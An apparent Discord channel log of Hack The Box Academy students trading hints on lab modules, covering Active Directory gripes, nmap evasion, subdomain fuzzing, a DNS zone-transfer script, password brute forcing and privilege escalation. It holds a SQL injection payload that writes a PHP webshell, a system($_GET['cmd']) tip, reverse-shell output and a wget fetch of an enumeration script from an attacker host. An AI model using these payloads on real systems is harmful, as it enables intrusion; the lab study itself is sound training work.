This can't be how pentesters spend their time on Active Directory. It should be about hacking it. Not whatever I had read/watched as the starting point.
For whatever reason, I can't seem to point how this is far worse and boring, than when I read about IT. Maybe I was expecting "hacking" on Active Directory soon. But I just can't bear to read/watch them.
These tutorials I saw in Active Directory seem completely different from hours and hours of watching Linux, HTML5, basic web hacking, python3, etc.
I... need to talk to a real pentester, bug hunter, or even a hacker. I need to get motive again. I know Active Directory is supposed to be a big deal, but I just can't see it. I tried. But I can't. What.. did I fail to see.
I'm not hacker at all, brand new to it all but yeah I HATED Active Directory stuff. Absolutely mind numbing
@rustic sage try tryhackme throwback
I'm not paying $60 for 30 days use only. Especially after I got discouraged so badly now.
well there are new ad stuff on thm did you check them out
active directory exploitation is not necessarily for beginners so you are not going to find much in the beginner stuff
I already read and done almost everything related to thm subscription.
Of course, and that is what I am expecting after doing thm for months now. I'm moving to a more medium level in htb, but that basic I saw when it came to active directory here, and outside of htb, it doesn't make sense to me.
I need to talk to a legit pentester about it.
this is a very big field, you are not going to become a pro hacker just by completing a couple of rooms on thm
afaik AD is for pivoting
sure, wait a bit, there are some pro hackers on this channel
thk. I feel so discouraged. I need to snap out of it. Which channel do u recommend I should visit and ask 1st?
honestly maybe a little break and focus on something else might help you
But eventually I will face AD again soon enough. And I thought reading how to write a pentest report was boring.
learning how to write a report is never gonna be exciting in any field
@rustic sage you completed 15 rooms on thm... really?
so the zap tutorial for the hud is super useful
still don't know why it's not loading my preconfigured browser though xD
Hi, I'm having trouble with the module on vulnerability assessment:
Specifically the task for nessus.
I configured the scan as described in the task, added the credentials and scanned. I got a report that looks good, but I can't answer any of the questions. E.g. it asks for a certain plugin, but that plugin is not in the report
Where is the pop3 service from?
oh wait wrong section sorry i mean the ||ftp||
AD is just a dry subject on any front. Operation, defense and offensive. I am not sure what bells and whistles you expect from it but when you learn to use it in school it’s literally just massive 800 page textbooks. Also most of AD pentesting and defense is moving into very automated toolsets, so knowing the history is very useful. You have to remember HTB assumes you started learning on their platform.
I'm stuck on Web Request - GET module exercise .... I can't find the flag...
any hints...
👌 ok
Did you use the hint?

So RL AD pentest & def are mostly automated? I did not know that. If u know a blog, video, or article where how RL pentester used their automated toolset in AD. May u point to me where it is pls?
Lastly, I was already expecting and disliking what htb and thm will present to me with their manual books in their 20th century teaching style.
can i dm you i have the same issue ?
I mean you will need to look into vendors like Rapid7, I know that's a big one, CrowdStrike has some stuff too. I am not sure why you went in with a mindset of disliking the content; if you did not like it, leave the owners a message on what could be improved. However, as someone who has their CTT+ and has done trainings, I would assume it stays this way because it's an 80% coverage shot with their teaching style.
@oblique shale It's like reading "how to write a report". I know I will dislike it, but I'm still going to do it. However the AD basic "how to manual" teaching just doesn't make sense at all to hacking. We are supposed to break and make the system do stuff it is not supposed to, not renaming objects, or other pointless things "as tasks".
Btw thanks for the Rapid7 & CrowdStrike. Never heard of them before.
Yes, I have seen those files. Do I need to send a reverse shell to connect to the target?
or need download app XAMPP and connect?
Correct me if I am wrong but you are doing the "Introduction to Active Directory" The General category course?
exploit the ||ftp|| that ||run on port 443||
That is correct. I am testing the water with htb before considering subscribing. I read from this blog https://www.hackthebox.com/blog/introduction-to-active-directory, and decided to see the path they recommended.
Ok so this may help you in your learning: there are three categories on the academy, there is General which is essentially IT skills, Defense (blue team) and then Offensive (red team). You are trying to take a learning module from the general category and shove it into expectations of "Hacking or pentesting", which is not at all what that module is for. Why not give an offensive module with AD a go?
The general category is general security, IT, cyber not just pure hacking. I think that is maybe why you are upset.
Did u read that blog? Scroll down to the latter half.
The AD Track is an excellent resource for practice. Tracks are curated lists of machines and challenges that users can work on to master a particular topic. This track contains boxes of varying difficulties with various attack vectors. If you cannot yet solve these boxes on your own, you will still learn a lot by following a walkthrough or video. The more you are exposed to AD (and any topic), the more comfortable you will become, and eventually, things that right now may seem completely foreign will become second nature.
I'm not upset in that. Why else did I learn IT in python3, html, & etc. That doesn't make people hackers. But we do apply it commonly in RL.
that's the foundation
Probably safe to say trudge through the Microsoft essentials crap of the path then you will get into more offensive and educated learning
Hey, can you maybe explain how to?|| I got a user and uploaded files to the site, but they don't execute when i try to run them :/|| 🙂
Not all foundations have a solid ground in RL jobs. I can see why they chose the name "Academy". In RL, most of it is not practical in a job. For example, a company did not give us a job to spend a couple of minutes manually calculating something repetitive every time doing the same task. Companies have software for that. So we will likely forget about it in the future, and wonder why we even bothered learning it and must pass it in an exam.
I do not agree with that statement I guess, there is value in learning those fundamentals, some deep level sys admins literally do that kind of stuff so it happens I guess I am just not sure what your expectation was of that course?
i use a ||php payload with powershell|| if you need any help with that feel free to dm me
Huh? We are not debating if there is value in any foundation or fundamentals. Don't go off the rails Drachen. Just bec it's the foundation, doesn't mean there are no flaws. Just because writing reports for the client is important, doesn't mean I can't dislike it, or any important context. Any job will have its ups and downs.
I mean what is the flaw
I can't find the root submit flag
any idea
for Learn the basics
of Penetration Testing
Okay, thanks! Im done for today, but ill text you next time 🙂 have a nice weekend!
With the Student subscription can I access my finished modules once it is finished?
yes you can revisit any module you complete
Thanks :)
np 🙂
what is the root flag for the first level ? please
Got it ,Thank you bro
Np
hi all, Happy Friday! just a quick update. the Learning Process module has 8 new sections by @drifting knoll
What have you tried and how did you come to those answers?
can someone help me with the last question on https://academy.hackthebox.com/module/143/section/1485 ??
i have this command but it just hangs
in bloodhound it shows "addself" but idk how to convert that to ObjectAceType
what command can i run to see it
@onyx dust DM me 🙂
was tier 0 redeemer new? Haven't been here in a while.
I was sent back to tier 0 from tier 2 cos of it
yea its pretty new
Has anyone done INFORMATION GATHERING - WEB EDITION
Page 7 Active Subdomain Enumeration
What is the FQDN of the IP address 10.10.34.136?
what am i missing here ?
nslookup -query=PTR <IP>. Does not work even when i use the name server ||ns.inlanefreight.htb||
dig -x 10.10.34.136 ||@ns.inlanefreight.htb|| also does not work
look back at the part 2. Testing for ANY and AXFR Zone Transfer
you need to look at one of the subdomains
What is the name of the group that is present in the Company Data Share Permissions ACL by default?
hello, could someone help me with this? I've spent almost a whole day on it 😦
hello someone could help me with this I've been almost a whole day
can you give me hint on how to find upload directory ?? anyone else for file upload assessment ?
Ahhh ! I figured it out
Got it lol thanks
2 zones here so......
Wow this is a good module
hello guys
Enumerate the hostname of your target and submit it as the answer. (case-sensitive)
how can i find hostnames using nmap? if someone can guide me
nmap -sL
i used -A and it works but thx anyway
hello, anyone who has completed the Command Injection module..!!!
I'm having issues with INFORMATION GATHERING - WEB EDITION Virtual Hosts:
My first step, I set up the following in a file called vhosts to make sure ffuf is working before I load in a massive list
app
blog
dev-admin
forum
help
m
my
shop
some
stor
support
www
My second step I ran the following
```
┌─[scientist@Michaels-MacBook-Pro-2] - [~/hacking/wordlists/SecLists/Discovery/DNS] - [Fri Jul 29, 15:41]
└─[$] <git:(master*)> ffuf -w ./vhosts -u http://10.129.42.195 -H "HOST: FUZZ.inlanefreight.htb" -fs 612

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.5.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.42.195
 :: Wordlist         : FUZZ: ./vhosts
 :: Header           : Host: FUZZ.inlanefreight.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
 :: Filter           : Response size: 612
________________________________________________

app                     [Status: 200, Size: 103, Words: 3, Lines: 6, Duration: 125ms]
:: Progress: [13/13] :: Job [1/1] :: 18 req/sec :: Duration: [0:00:02] :: Errors: 12 ::
```
**Things to note: it found ||app.inlanefreight.htb|| I used curl to get flag2**
**Questions: Why are there 12 errors.**
I went on to try a bigger list nothing showed up, even though app was one of the words in the list. So does this imply i'm using ffuf incorrectly, is this my ISP filtering things ? What am I doing wrong here.
Thanks.
Figured it out
For those of you in the future that may have the same issue wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt --hc 400,404,403 -H "Host: FUZZ.inlanefreight.htb" -u http://10.***.***.*** -t 100
I'm working on NETWORK ENUMERATION WITH NMAP and need help with Firewall and IDS/IPS Evasion-easy lab. If anyone have any knowledge on this module, please pm me.
hello everyone. u know how some modules have hackthebox machines at the end of them? it looks like this (from broken authentication, for example)
are u supposed to do those machines at the end of the module? i haven't been but i was wondering if everyone else is
you use ffuf in the other post and wfuzz in your solution.
You dont absolutely have to but we recommend those boxes and other content at the end in case you want to challenge yourself a step further.
Yeah, ffuf wasn't working for some reason, I gave up on it and tried wfuzz.
Hi everyone, I am working on network enumeration with nmap / service enumeration. The question is "Enumerate all ports and their services. One of the services contains the flag you have to submit as the answer.". I followed the lesson and tried tcpdump and nc in 2 separate tab. The tcpdump never show anything, but the nc show something like this: 220 HTB{xxxxxxxx}. I tried xxxxxxxx in the answer but it said wrong. Can anyone help me with this?
Include the HTB{}
not just what's inside
And don't forget to follow the instructions in the #welcome channel to verify your account and get more rooms opened up :-)
Hey all I’m considering a student subscription when I manage to get some money together. It says instant access to everything up to tier 2, will I have to pay more money in order to have access to tier 3 material?
thanks alot!
anyone? i've got two high risk vulns. one of them looks more promising than the other
Hi guys, I need help in determining how to see if Telnet block login attempts for a set duration of time.
E.g Every 4 login attempts, the Microsoft Telnet server will deny all login attempts for about 5 seconds, before allowing incoming connections again
hello guys, i am at the skills assessment for SQL injection fundamentals, and i can't seem to get the webshell to print out the contents of /
cn' union select "",'<?php system(dir /); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell1.php'-- -
this is the command im using
pwd works
the above command also successfully executes, but then shell1.php is empty
could anyone please help ?
Try putting single quotes for the parameter being passed to the system function
system($_GET['cmd']) is more flexible. You can pass your command with the url parameter and don't need to upload a shell for each command
Anyone? I've got the vulnerability but I'm having difficulties exploiting it
u sure it's "High" and not "Medium" ?
100%
it's the url encoding that's throwing me
i know i have to add something to the url it gives me
so here you don't see the content of /etc/passwd ?
Thank you, i will try it now
i do yeah got it here
but i don't see a flag.txt
and u cant read the flag ? or you don't see the flag ?
did u read the question carefully ? 😅
that's what i mean. i'm sure i've done the 'hard' part
i'm having a brain fart here
YAR HAR i got it
man i'm dumb
i encoded '/' as '%24' instead of '%2'
well done XD
Hi everyone, I was wondering. I currently have the student subscription and I'm doing a lot of courses. Will I still have access to all the courses I'm doing/have done ? thx
You can revisit all the finished courses after you finished them. Not sure about when your subscription ends
Yeah that's why I'm asking, it's my first subscription
Likely access will be gone by then
can someone guide me on this without spoiling
and the course will be marked as completed ? if so we would never be able to read it again except by buying another subscription ?
which module ?
u can dm if u want, but not sure i remember 🙂
i'm having a rough day. i've edited this html code to click this button 20+ times now and no flag 😢
i'm editing the html then sending to repeater but it's reverting back to disabled. send help
when you say single quotes, do you mean around the dir / command? like 'dir /' ? that doesn't seem to work
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell1.php'-- -%'' at line 1
double quotes did it
thanks!!
np!
Rng is involved ;)
Just have to modify it once
yeah i'm REALLY unlucky... i did it a lOT
Does anyone have a nudge for me on the windows privesc skills assessment 1? I am trying to find the ldapadmin account credentials but have had no luck
GOT IT
hi i'm doing File Upload Attacks and I was wondering why some file extensions like php2, php6 or pht does not work as webbshell and why are we seeing the source PHP code in the source code section of our web browser ? thx
hi everyone , i am stuck at module Login Brute Forcing - Skills Assessment - Service Login , I tried but couldn't find the username & password ssh to the server , I need a hint about the username because I can't find it : ( , please help
it depends on the technologies the server is using, try different extensions until one works. Also I recommend you print an echo instead of the cmd, to check which extensions work and then upload the webshell
yeah it was strange to see the php code XD
It's just that the server doesn't process it as php code, so it sends it to you raw
yeah
u tried with the usernames/passwords given in the module ?
I tried the wordlists used in the module
which skill assessment are u on ?
Brute Forcing - Skills Assessment - Service Login
In previous sections they gave you this github https://github.com/urbanadventurer/username-anarchy, try using the info of the other skill assessment
the problem is i cant find any info about username 😦
or a name to be able to run this tool
In the skill assessment website you found a username
username is user ?
to answer this question you must have seen a username
if not, do the website skill assessment first
maybe ||harrypotter || password is username ?
close, use this tool to generate a wordlist of usernames
thanks
Hello friends, has anyone completed challenge #3 of the network enumeration with nmap module where we want to "find out the version of the running services"? I believe it is port 50000 that is running the service ibm-db2. What I have tried so far is "sudo nmap 10.129.2.47 -f -Pn -n -p50000 -v -vv -sSU --source-port 53 -sV -D RND:5", pretty much throwing every evasion method I can, but I am still getting that it is tcpwrapped. Any help would be greatly appreciated, I'm 4 hrs in on this challenge.
Can someone help with File Upload Attacks, the section of Type Filters?
yup
DM
Please i need a command to filter this output... i only need the subdomains
trying to connect to MSSQL via PowerUpSQL.ps1 getting a timeout in the Active directory enumeration and attack module
any idea what i'm doing wrong ? I tried on both the WIndows and Linux machine and I can connect properly. I know the creds are right because i can run commands like 'Select @@version' and get a response after a minute or two.
@sharp torrent hey can I dm you I need help in ACTIVE DIRECTORY ENUMERATION & ATTACKS module
have tried other methods to connect to MSSQL?
unzip the file first to know the content
@cosmic dirge unzip the file Misc_hashes.zip then get the file hashcat.7z, your task is to extract and crack the hash from that file not Misc_hashes.zip (also the tool is maybe broken)
@cosmic dirge use > to the new file
he didn't extract the hash, that's an error
So I have right
@cosmic dirge use the command unzip Misc_hashes.zip
I done but the hash is long 1 km and is not the correct format
How they show
Don’t have this $pkzip$ on the front and end
because you didn't extract the hash
this is an error not a hash, you ran the tool on the wrong file
GETTING STARTED: in the Web Enumeration section there's this IP address that you're instructed to go to, " https://10.10.10.121/ " & " https://10.10.10.121/ private", neither of which take you anywhere other than "The connection has timed out" page. I've refreshed the page and come back and keep getting the same issue. Can someone assist with the problem? #GETTING STARTED
@rain marlin i think its just an example , i tested and get same result on my end
🤦🏾♂️ Thank you that makes sense;
no worries 🙂
Have you completed this module?;
yep
Oke …which tool I have to run
Could someone help guide me in the right direction with this part "Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag." I don't want answers, just a little push. I visit this IP and there's nothing there to log into
Try running gobuster to discover pages/directories
👍🏾 Thanks
Could I please get a hint on which user/wordlist to use for the easy lab in the "Password Attacks" module? I've already tried default creds from ihebski's cheatsheet and other ones found in SecLists, also tried different permutations of the wordlist provided under resources and a few other wordlists with common usernames against both the services for a few days but not finding valid creds. Thanks!
@steel kite use the resources files of the module
I did but found nothing, any permutation rules applied to the password list?
the custom rules gives out a 90k list which I brought down to something more manageable and im trying to run against the default username list from the module
Oh sorry, I haven't reached that question yet, was sure you're doing the network services at the beginning of the module.
nope already done that, this is all about the user/pass wordlist used looks like and I'm going crazy 🤪
Dm
Looking for a bit of a nudge on the Firewall and IDS/IPS Evasion Medium Lab
hello i do not find flag for DNS Attack on module ATTACKING COMMON SERVICES. some help ?
Hello I am looking for help on the 'DNS Enumeration Using Python' module.
QUESTION: Perform a zone transfer using the DNS-AXFR.py script against your target for the "inlanefreight.htb" domain and submit the total number of unique subdomains found.
```python
#!/usr/bin/env python3

# Dependencies:
# python3-dnspython

# Used Modules:
import dns.zone as dz
import dns.query as dq
import dns.resolver as dr
import argparse

# Initialize Resolver-Class from dns.resolver as "NS"
NS = dr.Resolver()

# Target domain
Domain = 'inlanefreight.htb'

# Set the nameservers that will be used
NS.nameservers = ['ns1.inlanefreight.htb', 'ns2.inlanefreight.htb']

# List of found subdomains
Subdomains = []

# Define the AXFR Function
def AXFR(domain, nameserver):
    # Try zone transfer for given domain and nameserver
    try:
        # Perform the zone transfer
        axfr = dz.from_xfr(dq.xfr(nameserver, domain))

        # If zone transfer was successful
        if axfr:
            print('[*] Successful Zone Transfer from {}'.format(nameserver))

            # Add found subdomains to global 'Subdomain' list
            for record in axfr:
                Subdomains.append('{}.{}'.format(record.to_text(), domain))

    # If zone transfer fails
    except Exception as error:
        print(error)
        pass

# Main
if __name__ == "__main__":
    # For each nameserver
    for nameserver in NS.nameservers:
        # Try AXFR
        AXFR(Domain, nameserver)

    # Print the results (an empty list means nothing was found)
    if Subdomains:
        print('-------- Found Subdomains:')
        # Print each subdomain
        for subdomain in Subdomains:
            print('{}'.format(subdomain))
    else:
        print('No subdomains found.')
        exit()
```
hey guys i'm doing the broken auth module, brute force usernames and idk why i get the same output for all users for this question (the hidden input is always the user we tried)
This is my edited code^
yup
yes
Am I missing something in my code?
i brute force subdomain with gobuster with all Seclists/Discovery/DNS
i found some subdomains but no flag
zone transfer doesn't work
can u dm me the domain u found
sure
Bump - anyone able to give me a nudge on windows privesc assessment 1?
NVM i was able to pass my target machine as one of the nameservers and that was the key.... silly me
problem solved thanks @grave dust
Thanks for the input figured it out. Thank you;
Stuck in the same place @vale salmon 🤷🏾♂️. I've found what looks to be the version. It's literally listed under version but, the answer I give is incorrect. I'm wondering if it's me or if it's a broken module 🤨
Yeah, I'm pretty confused at this point
@vale salmon I'm taking screenshots and opening a ticket. Sometimes the answer box is finicky. I don't know. I have to move on though. I've lost so much time to this module because of this.
Let me know if you hear something
@vale salmon Just sent all my research in a ticket. I'll let you know how it goes
For anyone searching for help on this in the future feel free to message me. My hint would be to ignore where the question is taking you and focus on methods for privesc. Once you've sorted that, answering the questions is a piece of cake!
@vale salmon nmap medium lab is weird. I just revisited it and used the exact same command as in my documentation but got a different result. I haven't been able to find a command that yields the flag.
Huh. That is weird.
Disregard, I figured it out.
~~Is there a problem with Nibbles? I'm on the Initial Foothold section and I can't get my reverse shell to stay open. I've uploaded the php file to the target website and I've gone over the line of code within it multiple times to make sure it's correct. But when I open up a netcat listener on my machine and then try to establish the reverse shell, I get the following:
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::54321
Ncat: Listening on 0.0.0.0:54321
Ncat: Connection from 10.129.8.210.
Ncat: Connection from 10.129.8.210:35348.
/bin/sh: 0: can't access tty; job control turned off
$
And then it just returns me to my normal input line.~~
If you are referring to the NMAP - Firewall IDS/IPS Medium chapter, if you are seeing a version number, then you are not getting the correct answer. It'll be a flag. Try ||checking out the DNS nmap scripts.||
What would be the right channel to get help troubleshooting the error I'm running into trying to connect to the starting point vpn?
@pine dagger Your response is redacted lol. Be careful not to give anyone exact answers. Judges are okay. I found something VERY strange while enumerating this target. I'll try that as my answer. If that IS the answer, I'll be kinda disappointed in HTB for being "off track" with their specific question and specific answer.
@hybrid flax click the help box when you're logged into HTB. It'll give you article/discussion recommendations. If you're still stuck after that, you can submit a help ticket to tech support
@pine dagger Nudges* are okay. And you gave me a nudge. I'll have to try again when I get the chance and let you know how it turned out
What addressing mechanism is used at the Link Layer of the TCP/IP model? Did anybody get this answer under "Intro to Network Traffic Analysis" module? I tried "MAC addressing" but it isn't working
@pine dagger I've tried various scripts, to no avail. I thought for sure the ||dns-nsid|| script would work, but I'm not getting the flag and am unsure why.
need help: INFORMATION GATHERING - WEB EDITION
Information Gathering - Web - Skills Assessment
Perform active subdomain enumeration against the target githubapp.com. Which subdomain has the word 'elephants' in the name?
i downloaded and ran sublist3r found a bunch of sub domains but non with elephants in the name
anyone give me a nudge
@rustic sage Are you using the right nameserver?
probably not... im just ran it with githubapp.com
You can also use -o file and then grep the file for elephants
ill try that after i run the right name server
i can not find the right tamper to pass the sqlmap final assessment minishop
can anyone give me some hint?
keep getting syntax error
but i can figure out what was filter out
but dont know how to go further
@wind plaza Are you using Burp Suite to capture packages?
There is a specific packet you have to capture to solve that exercise
Then sqlmap should tell you which settings to use
If you look at the end of the command running it'll tell you which tamper they suggest to use
That should be enough to get through 😐
anyone around finish attacking common services?
im a big noob, can someone explain what the backslash function is in this command? "smbclient \\10.129.1.12\WorkShares"
Anyone able to help on Windows Privilege Escalation assessment part 2? Everything tells me it should be vulnerable to an exploit that was run through in the course. I run the exploit in the same manner and with the same .exe used in the course (firefox related) and it seems to work, but I don't then have the required access to copy the malicious .exe.
A path is a string of characters used to uniquely identify a location in a directory structure. It is composed by following the directory tree hierarchy in which components, separated by a delimiting character, represent each directory. The delimiting character is most commonly the slash ("/"), the backslash character ("\"), or colon (":"), thou...
thank you so much!
still cant get the sqlmap final
i get different response on -v 6 when I use -d='{"id'=1'} and -r request.file
and I dont know why
-d will give me html of entire page, -r will give syntax error
...you know I redacted it myself right? You just click on the text to reveal what I wrote.
DM me
Hi fellows!
I’m trying to solve the Firewall and IDS/IPS Evasion - Medium Lab of Network enumeration where the challenge is to find the DNS server version
I have nmap and found filtered ports and opened ports
Can anyone help? Thx!
alright then 😂
Consider which protocol DNS uses by default.
Perfect great! Thanks @acoustic owl
I may need help on Broken auth, Predictable reset token. i think i got the thing but i'm doing something wrong
See my response about 9 hours ago to UnderTheRadar 🙂
Hi one help needed in windows fundamental module
Skill Assessment Q.How to get the
SID of HR group
Already tried whoami /? GROUPS
But no luck. Not getting HR group name nor its SID
DM
hey man, i'm stuck in "Using Web Proxy" module on question "Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)". i do all the reverse hashing but always get the same size of the response.... can anyone help me please??
solved
Am really enjoying the labs atm. Tier 2 is definitely a lot more fun 🙂
Can someone assist?
@unique valve Hello, I currently have a student subscription. After finishing all the modules that are available to me, and after finishing my university ( I will no longer be a student ), will I get to keep the access to the modules or I won't be able to access the completed modules ?
Oh lol. No. I didn't know that. I didn't even know we could do that. That's cool 🙂
Please, can someone help me with the File Inclusion Skills Assessment?
||I injected the php shell by log poisoning in the admin panel but it is not executing the commands||
@drifting knoll FYI, Loved the OSINT: Corporate Recon Module, sadly Rapid7 are not currently approving requests from individual researchers or bug bounty participants to their Forward DNS datasets i.e. (FDNS)2022-07-30-1659149393-fdns_txt.json.gz 😦
Its so that people can share hints, without people getting spoiled. Still cant be too specific, but hopefully it will get you on the right track.
thank you
Dm if you still need help
It's in #613049811481919508 too
I remember this one, be very particular about whether you're using single quotes or double quotes.
Hi guys!
Skill Assessment - Broken Authentication from the "Broken Authentication" module.
- Selected users.
- Filtered passwords.
- Stuck, ((
how to phase passwords bypassing Rate Limiting?
Do you need a working script here?
Or Burp forces can do it.
||The X-Forwarded-For substitution trick:||
Unfortunately, it did not pass.(
I will be glad of any advice.
Thanks.
thx, yea i saw that. they changed their Open Data terms and conditions
hey guys, in "broken auth" in "bruteforcing cookie" i tampered the cookie by modifying the role (that i'm 99% sure it's the right one) but get this ?
after you filter the rockyou wordlist it should be down to ||50 or lower password|| and i recommend you use burp intruder and set a 25 second delay between each password try
what role did you change it to?
||super||
and what's strange is by just changing that or by changing the user too i get the same message
i just give it a try and it's working fine for me
can you dm the cookie that you use for this
shure
I'm looking for this option in Intruder, could it be that new versions don't have it?
no burp always has this especially the new versions
what is its exact name in the options?
in burp intruder tab click "Resource Pool" and choose "Create new resource pool" give it a name set the Delay between requests to 25 seconds in milliseconds
someone solved the "Comparison Operators" part on the bash modules? idk what operator i should use and i been 3 days in it 
@bleak willow DM me 🙂
ty ❤️
@vital adder In, what you need, thank you!!!
God... I hate Active Directory ...
Do I have to know this stuff...
Hello everyone hope you've spent a good week-end, I am currently stuck on the section "DNS" of "Footprinting module" and on the last question it is asked :
"What is the FQDN of the host where the last octet ends with "x.x.x.203"?", I took every hint on the forum and I am still stuck.
What I tried : I got both the main zone transfer and the subzone "internal" in a txt file
like here
and I tried to dig and dnsenum methodically but there is surely something I didn't get and I don't know what it is
I'm having issues on the Bloodhound module with Sharphound giving different values for the quantity of users
I'm having a hard time connecting to the box in the first place with xfreerdp so I'm suspicious that the performance issues are impacting the Sharphound collection
@fair mesa DM me 🙂
Any Help with Web Attacks Skills Assessment, after finding the flag.php.log, I get the flag, but it seems to be the same as earlier assignment, and not working
Nibbles - Privilege Escalation:
I can't get the reverse shell to pull in LinEnum.sh. I have it installed on my attacking machine, but for some reason when I try to pull it in through the reverse shell, I get the following:
Connecting to 10.10.15.227:8080... connected.
HTTP request sent, awaiting response... 404 File not found
2022-07-31 14:47:42 ERROR 404: File not found.
I'm thinking it maybe has something to do with where LinEnum was installed, but that's a really shaky theory and it's all I've been able to come up with.
how are you trying to transfer LinEnum.sh ?
wget http://<your ip>:8080/LinEnum.sh
I have my python server set up on my attacking machine, using port 8080
I don't understand what's going on. I installed LinEnum on my attacking machine, but for some reason the target can't find it to bring it back.
It is around 76% of the desktop market, so to answer your question, yes.
Has Anyone Completed Web Attacks - Skills Assessment
I spent half an hour doing the skills assessment of Server-Side attacks and the flag is right in front of you
that seems...comforting
Web Attacks Skills Assessment, why can I not enumerate users by changing the UID, what am I missing?
Hey, Thanks for your patience on this reply. You will retain access to all the modules you completed 100%. If you are using a school email account you may want to consider adding an additional personal email as a backup in case you lose access to your school issued email sometime in the future.
change the request to ||GET||
Getting the same issues, nothing changes when I try to change the UID:
This was easily my least favorite skill assessment, it feels like it should be the skill assessment for another one of the courses.
@tiny ledge oh wait sorry i misread question that's not where you enum user UID
check in ||burp sitemap||
I feel this deep in my soul
what is the longest module you've done so far? i'm doing active directory enumeration & attacks and so far it's the longest one
oh yes
moood
it's 43% market share so yes u have to know it.
So far, in terms of how long it took me, the NMAP module took me the longest, but it turns out it was an issue with using my local box instead of Pwnbox. That happens every once in awhile.
powershell is so awful
active directory too. just as a system it's bad because it's too verbose and overly complex for no reason
i think that's what is making it take longer - the experience is unpleasant since the system is so boring awfully verbose and not in a good way.
section 28 of 36 and it seems 36 sections to a module is above average
even in the training it reflects the verbose nature of the bad system
THIS is what I mean with modules being finicky sometimes 🤦🏾♂️🙄. I always wonder if it's an issue created by me using my box. I hate using pwnbox lol. I actually prefer Kali to Parrot and I like that all my settings and preferences stay with my VM.
@vale salmon Support reviewed my research and screenshots. Turns out, I'm just wrong in my answer. I haven't checked if it's this weird flag I found while enumerating at a different point or not lol. That's probably what it is 🙄🤦🏾♂️😁
Has anyone done shells & Payloads? The connection with nomachine keeps timing out. Any advice?
Would it be better to do the bug bounty path on Academy and then immediately start bug hunting or would you keep training on HTB until I am comfortable with easy and intermediate boxes in actual HTB VIP?
You can always do both, I'd personally pick a target and work your way through the path, and practice what you learn at the same time that way you're actively practicing what you learn (paying attention to the scope of course). I'd keep training on HTB Academy no matter what, the content is invaluable whether you're a beginner or experienced. In this field, there is always something to learn for everybody's skill set, and feeling uncomfortable is something that everyone feels, the most important/hardest thing is actually 'starting'.
Ok
Is bug bounty path enough to start bug hunting tho and start making decent money?
I’m doing THM and HTB Academy
Would doing Pentesterlab be worth it once I get past bug bounty path?
Or once I complete THM learning paths?
@vale salmon @rigid sonnet@pine dagger I'm so pissed off that I couldn't get the flag simply because I wasn't using pwnbox. I've been enumerating for DAYS trying way too hard to finish this lab. I decided to try in pwnbox just to see and it took me 30 seconds to get the flag 🙄🙄🙄
Yep, that's exactly what happened to me, too
@vale salmon I tried it after reading your comment about the same. What made you finally decide to try it in pwnbox?
Honestly? A hunch. It isn't the first time that has happened to me, although it is relatively uncommon.
you all talking about nmap medium lab?
Yep
@vale salmon Super uncommon for me too. My own Kali VM can get everything done 99% of the time and the other times I MUST go through pwnbox. It's annoying. And rare. But super annoying when it does happen.
@west canopy Yep
Agreed. Last time it was the Windows Server section of the Windows Privilege Escalation Module.
i want to compare notes on medium lab , mind if i DM?
@vale salmon I can't even get the Windows module to load properly. I guess I'll use pwnbox for that one too 😁
Sure
@west canopy just type it out here 😉. That way ANYONE who can help can chime in
@west canopy Damn. I don't know how to redact lol
🙏 🙏 Windows Priv Esc assessment 2 any help please 🙏 🙏
Ok - so as with the first assessment I ended up figuring it out after banging my head against a wall for many hours. Anyone in need of future help for skills assessment 2 feel free to reach out. I would say for answering Q2 you do need to execute an exploit explicitly walked through in the module, but pay very close attention to using full/absolute paths when doing the exploit and pay attention to x86 vs x64 differences.
And the LinEnum.sh is in the same folder where you started that server?
And the IP is the proper one? Check with ifconfig. If you use vpn, the tun0 IP.
hi, i'm in the same problem. Were you able to solve it?
Hey guys has any of you finished Linux Privilege Escalation? I am Stuck at Flag 4. I found the credentials for the Tomcat login but don't know where to log in. I tried http://localhost:8080/manager/html but Firefox says that it is not possible to establish a connection to server. I don't get the possibility to enter credentials. Any Help is very welcome
Can someone help me with the Footprinting module in the SMB section. I can’t get the answer to the question: What is the full system path of that specific share? I hope someone can help me with that.
Hi, can you please tell me, what variable i should write out in "Tcpdump Fundamentals", question "Were absolute or relative sequence numbers used during the capture?"
"yes" and "no" doesn't apply
Try "True" and "False"
none 😦
I could use some serious assistance on server side attacks ssti example exploitation 2. I can't install tplmap because i get an error back saying pip is deprecated and i can't use it on the pwnbox either. i tried the command from the exercise ./tplmap.py -u 'http://ip:port/jointheteam' -d email=bleh but i get no such file or directory. i tried using locate tplmap.py and same thing just get an error. Or if someone could help me with setting up a tornado payload cause i have no idea what the documentation provided is trying to say.
Oh sorry, went and checked. You answer "Absolute" or "Relative"
Yahoo, thanks
how to know host name with nmap?
anyone completed the "Using the Metasploit Framework" module? needed to get some clarification on the following question: "Use the Metasploit-Framework to exploit the target with EternalRomance. Find the flag.txt file on Administrator's desktop and submit the contents as the answer."
What clarification do you need?
I tried nmapping the target IP (nmap -sA 10.129.69.112 -Pn)
but got:
Host is up. All 1000 scanned ports on 10.129.69.112 are in ignored states.
If I don't add the -Pn flag then I get "Host seems down. If it is really up, but blocking our ping probes, try -Pn"
So how would I go about finding open ports for Windows server target
On Linux module: name of the config file that has been created after 2020-03-03 and is smaller than 28k but larger than 25k? I typed "find / -type f -name *.conf -user root -size +25k -newermt 2020-03-03" I get a huge amount of files and Permission denied? What am I doing wrong?
